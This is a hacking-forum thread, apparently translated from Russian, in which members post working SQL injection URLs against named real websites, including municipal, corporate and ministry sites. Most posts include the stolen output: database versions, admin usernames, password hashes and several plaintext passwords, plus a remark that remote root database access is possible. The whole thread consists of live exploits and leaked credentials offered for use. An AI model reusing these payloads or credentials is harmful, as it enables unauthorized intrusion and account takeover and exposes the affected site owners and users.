SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. spherics

    spherics Elder

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    masternet, if I may, I'll add one from myself: their own developers

    http://itdevotion.com/portfoliodetail.php?ID=-5+union+select+1,2,concat_ws(0x3a3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+tbl_user/*

    version: 5.0.45-log::
    user: [email protected]
    database:ktunney_rqop22i

    admin::admin15613$1231fasd89h1a5g89
     
  2. ImpLex

    ImpLex Member

    Joined:
    12 Dec 2008
    Messages:
    23
    Likes Received:
    20
    Reputations:
    5
    pogreboc.com
    Code:
    http://www.pogreboc.com/girl.php?id=1+and+2=999+union+select+concat_ws(0x3a3a3a,id,name,pasw,mail),2+from+users_db--
    Those who are attentive will have noticed that the output is not visible to the eye. But it is there in the page source)
     
  3. masternet

    masternet Elder

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    http://www.annuaire-referencement-site.com/site.php?id=-1+union+select+1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.columns+where+table_name=0x745f61646d696e--
    admin columns
    --------------
    http://www.annuaire-referencement-site.com/site.php?id=-1+union+select+1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--
    all tables
    ----------------
    http://www.epodsolar.com/site.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
    4.1.20:epodsol_cm:epodsol_usr1@localhost
    ------------
     
    #7063 masternet, 16 Dec 2008
    Last edited: 16 Dec 2008
  4. ImpLex

    ImpLex Member

    Joined:
    12 Dec 2008
    Messages:
    23
    Likes Received:
    20
    Reputations:
    5
    As long as I'm here, there will be activity in this section.
    Code:
    http://www.memfis.eu/ko7e7a/users.php?id=-32+union+select+1,aes_decrypt(aes_encrypt(convert(concat(id,0x3a,nick,0x3a,name,0x3a,email,0x3a,website),binary),0x71),0x71),3,4,5,6,7+from+users+limit+0,1--
     
  5. ImpLex

    ImpLex Member

    Joined:
    12 Dec 2008
    Messages:
    23
    Likes Received:
    20
    Reputations:
    5
    cpdvd.ru
    Code:
    http://www.cpdvd.ru/catalog.php?id=-4203+union+select+1,2,convert(concat(userid,0x3a,pass,0x3a,nam,0x3a,fam,0x3a,tel),%20binary),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+users+limit+0,1/*
    A prankster's delight: so many user passwords, and the users leave their mobile phone numbers too.
    Here's a "more than 1 row" SQL injection: jir.it
    Code:
    http://www.jir.it/main.php?langid=2+and+if(ascii(lower(substring((select+concat(userid,0x3a,username,0x3a,passwd)+from+administration+limit+0,1),1,1)))%3C255,(select%201%20from%20administration),567)=1/*
    administrator:dc8df5c2eecdb245ead108cfb7352f8b
    Unfortunately, I couldn't crack the hash.
     
    1 person likes this.
  6. The matrix

    The matrix Elder

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    came across some Ukrainian Ministry of Internal Affairs site ;)
    Code:
    http://imei.org.ua/search.php?imei=123+union+select+concat_ws(0x3a,host,user,password),2,3,4,5,6,7,8+from+mysql.user+limit+0,1--
    slava@localhost:imei
    Code:
    localhost:root:*2679BA488B8CF696590C7C1D51804387761ECA94
     
  7. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    You'll get locked up :D

    PageRank: 6, TIC: 70

    http://www.accuracy.org/article.php?articleId=-1+union+select+concat_ws(0x2f,version(),user(),database())--

    5.0.67-log/[email protected]/accuracy_accuracy
     
  8. USAkid

    USAkid Elder

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    .us

    http://laneuse.ci.minneapolis.mn.us
    Code:
    http://laneuse.ci.minneapolis.mn.us/closure.php?pn=-1+union+select+1,2,3,version(),5+from+users--
    version: 5.0.45
    Code:
    http://laneuse.ci.minneapolis.mn.us/closure.php?pn=-1+union+select+1,2,3,concat_ws(login,0x3a,password),5+from+users--
    Login : pass

    jason:566cae743de1911e (MySQL type, couldn't crack it)

    http://www.turkuaz.us
    Code:
    http://www.turkuaz.us:80/news_det.php?newsId=1333&catId=-32+union+select+1,version(),3,4--
    version: 4.1.22
    user: [email protected]
    I guessed the only table, turkuazus.customers, but the guessing went no further (...

    http://www.mugama.com
    Code:
    http://www.mugama.com/profile.php?recordID=-1+union+select+1,version(),3,4,5,6--
    version: 5.0.51a-community

    Code:
    http://www.mugama.com/profile.php?recordID=-1+union+select+1,concat_ws(user_name,0x3a,user_password),3,4,5,6+from+tbl_user--
    admin:43e9a4ab75570f5b:admin
     
    #7068 USAkid, 17 Dec 2008
    Last edited: 17 Dec 2008
    1 person likes this.
  9. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    version: 5.0.30-Debian_1-log
    user: mma@localhost
    database: crmc
     
  10. The matrix

    The matrix Elder

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    blind (Subquery returns more than 1 row)
    Code:
    http://www.nightnday.org/detail.php?list_id=1213%20and%20if(ascii(substring((select%20concat(version(),char(58),user())),1,1))>=1,(select%201%20union%20select%202%20),0)--
    4.0.27-max-log:[email protected]
    pr=4
     
  11. Kakoytoxaker

    Kakoytoxaker Elder

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Yeah, right. Blind, with 17 of the 19 columns displayed :D

    http://www.nightnday.org/detail.php?list_id=-1573+union+select+1,2,3,4,5,concat_ws(0x3a,User(),Database(),Version()),7,8,9,0,11,12,13,14,15,16,17,18,19/*
    And the branch is the fifth, not the fourth
    atom_nightnday@localhost:nightnday:5.0.22
     
    3 people like this.
  12. kolenwal

    kolenwal New Member

    Joined:
    13 Dec 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    0
    http://citycarclub.us/news.php?id_news=-1+union+select+1,2,concat(version(),char(58),user(),char(58),database()),4/*

    4.0.20-log:wwwadmin@localhost:ccc_en

    There is access to mysql.user

    http://citycarclub.us/news.php?id_news=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(concat(user,char(58),password),0x71),0x71)+from+mysql.user+limit+0,1/*
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://felinewww.com/report.php?id=-877+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
    4.1.22-standard

    PR 4
     
  14. kolenwal

    kolenwal New Member

    Joined:
    13 Dec 2008
    Messages:
    7
    Likes Received:
    4
    Reputations:
    0
    http://www.audi.co.at/news.php?newsid=-631+union+select+1,2,3,concat(version(),char(58),user(),char(58),database()),5,6,7,8,9,10,11,12,13,14

    4.0.18-log:[email protected]:audiatdb
     
  15. The matrix

    The matrix Elder

    Joined:
    9 Jul 2008
    Messages:
    93
    Likes Received:
    186
    Reputations:
    138
    maxygen.com
    PR 6
    Code:
    http://maxygen.com/newsview.php?listid=999+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(user,0x3a,password,0x3a3a3a,host),13,14,15,16,17,18,19,20,21,22,23+from+mysql.user/*
    Code:
    root:55755cfc38918d75:::localhost
    Code:
    root:55755cfc38918d75:::93763-app1.www.desantisbreindel.com
    55755cfc38918d75:Brein950
    P.S. As you can see, one can connect to the DB remotely as root. I haven't tried it myself...
    Anyway, here's a freebie
     
    #7075 The matrix, 19 Dec 2008
    Last edited: 19 Dec 2008
  16. попугай

    попугай Elder

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    The matrix

    It's not that simple. This SQL injection is probably about a year old already) and nobody has gotten any further) .. you can't connect remotely there. And there are no writable directories.
    Besides, there is a completely simple PHP include there, and you can read all the files on the server, but you can't do anything with that(( You can't even get into the admin panel; the password and pass don't work for some reason(( apparently it's only possible from a certain IP.. though who knows..

    --skipped--
     
    #7076 попугай, 19 Dec 2008
    Last edited: 21 Dec 2008
    1 person likes this.
  17. masternet

    masternet Elder

    Joined:
    18 May 2008
    Messages:
    58
    Likes Received:
    43
    Reputations:
    0
    http://www.lawfirm.ru/article/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat_ws(char(32,45,32),version(),user(),database()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--
     
  18. 0xA1isa

    0xA1isa Member

    Joined:
    19 Jun 2007
    Messages:
    6
    Likes Received:
    9
    Reputations:
    5
    http://tibetska-medicina.cz/aktuality.php?cislo=-26'+union+select+1,user(),version(),concat_ws(':',username,password),5,6+from+users/*

    karlos:kunes1
     
    1 person likes this.
  19. 0xA1isa

    0xA1isa Member

    Joined:
    19 Jun 2007
    Messages:
    6
    Likes Received:
    9
    Reputations:
    5
    http://www.bigbuilding.com.ua/articleview.php?id=-1+union+select+1,version(),3,4,user(),6,group_concat(table_name+separator+0x0a),8,9,10+from+information_schema.tables/*

    http://www.bigbuilding.com.ua/articleview.php?id=-1+union+select+1,version(),3,4,user(),6,concat(login,0x0a,password),8,9,10+from+login+limit+0,1/*

    mythical:mistake

    and the shoddy admin panel is, of course, located at /admin/....
     
    1 person likes this.
  20. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    Code:
    http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,version(),4,5,6,7,8,9/*
    4.0.25-standard
    PR 5

    Code:
    http://www.pap.org.sg/articleview.php?id=1514&mode=&cid=-23+union+select+1,2,concat(user,0x3b,password),4,5,6,7,8,9+from+mysql.user/*
    root;14471e9057c154d6
     
    #7080 yarbabin, 19 Dec 2008
    Last edited: 19 Dec 2008